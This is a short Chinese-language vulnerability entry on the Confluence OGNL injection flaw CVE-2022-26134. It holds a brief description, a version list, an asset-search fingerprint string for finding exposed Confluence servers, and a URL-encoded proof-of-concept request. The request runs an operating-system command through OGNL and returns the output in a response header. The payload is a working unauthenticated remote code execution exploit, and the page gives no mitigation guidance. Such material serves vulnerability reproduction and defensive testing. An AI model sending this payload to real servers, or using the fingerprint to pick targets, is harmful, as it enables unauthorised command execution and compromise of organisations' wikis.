Atlassian Confluence OGNL注入漏洞 CVE-2022-26134¶

漏洞描述¶

Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新，通告了一个严重且已在野利用的代码执行漏洞，攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。

漏洞影响¶

7.4.17

7.13.7

7.14.3

7.15.2

7.16.4

7.17.4

7.18.1

网络测绘¶

app="ATLASSIAN-Confluence"

漏洞复现¶

登录页面

验证POC

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/